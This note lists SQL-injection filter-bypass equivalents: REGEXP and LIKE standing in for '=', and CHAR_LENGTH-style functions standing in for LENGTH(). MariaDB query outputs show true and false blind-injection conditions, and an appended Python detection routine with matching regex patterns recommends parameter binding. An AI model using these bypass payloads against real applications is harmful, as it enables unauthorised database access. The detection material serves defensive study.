This note records some equivalent functions and operators that come up in MySQL injection.

Filtered: = (the equals sign)

REGEXP =>

MariaDB [test]> select `req.host` from flow where id = 581 AND 1 REGEXP 1;
+---------------------------+
| req.host                  |
+---------------------------+
| init-p01st.push.apple.com |
+---------------------------+
1 row in set (0.00 sec)

MariaDB [test]> select `req.host` from flow where id = 581 AND 1 REGEXP 2;
Empty set (0.00 sec)

MariaDB [test]> select `req.host` from flow where id = 581 AND 0xef LIKE 0xef;
+---------------------------+
| req.host                  |
+---------------------------+
| init-p01st.push.apple.com |
+---------------------------+
1 row in set (0.00 sec)

MariaDB [test]> select `req.host` from flow where id = 581 AND 0xef LIKE 0xea;
Empty set (0.00 sec)

Filtered: LENGTH()

CHAR_LENGTH => OCTET_LENGTH() => CHARACTER_LENGTH() =>

MariaDB [test]> select char_length('s');
+------------------+
| char_length('s') |
+------------------+
|                1 |
+------------------+
1 row in set (0.00 sec)

MariaDB [test]> select char_length('admin');
+----------------------+
| char_length('admin') |
+----------------------+
|                    5 |
+----------------------+
1 row in set (0.00 sec)
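
A detection-side view of the equivalents in both sections above, as an added example that is not part of the original note: a Python check that treats =, REGEXP and LIKE as one class and LENGTH(), CHAR_LENGTH(), CHARACTER_LENGTH() and OCTET_LENGTH() as another, so a rule written for one member also fires on its substitutes. The function name `inspect_value`, the class labels and the sample parameter values are assumptions constructed for illustration.

```python
import re

# Operands seen in the note's conditions: hex literal, integer,
# quoted string, or a function call.
OPERAND = r"(?:0x[0-9a-f]+|\d+|'[^']*'|\w+\s*\([^)]*\))"
# "=" and the keywords the note shows standing in for it.
COMPARE = r"(?:=|\bREGEXP\b|\bLIKE\b)"
# A boolean connective followed by "<operand> <comparison> <operand>".
BOOL_COND = re.compile(
    rf"\b(?:AND|OR)\s+{OPERAND}\s*({COMPARE})\s*{OPERAND}", re.IGNORECASE)
# LENGTH() and the functions the note lists as substitutes for it.
LENGTH_FN = re.compile(
    r"\b(LENGTH|CHAR_LENGTH|CHARACTER_LENGTH|OCTET_LENGTH)\s*\(",
    re.IGNORECASE)


def inspect_value(value):
    """Return (class, matched token) findings for one parameter value."""
    findings = []
    for m in BOOL_COND.finditer(value):
        findings.append(("boolean-condition", m.group(1).upper()))
    for m in LENGTH_FN.finditer(value):
        findings.append(("length-function", m.group(1).upper()))
    return findings


# Constructed sample values for an integer "id" request parameter.
SAMPLES = [
    "581",
    "581 AND 1 = 1",
    "581 AND 1 REGEXP 1",
    "581 AND 0xef LIKE 0xef",
    "581 AND char_length('admin') = 5",
    "I like apples and oranges",  # benign text containing LIKE and AND
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:40} -> {inspect_value(sample)}")
```

Matching of this kind is suited to logging and alerting; binding the value as a query parameter is what keeps it out of the SQL grammar in the first place.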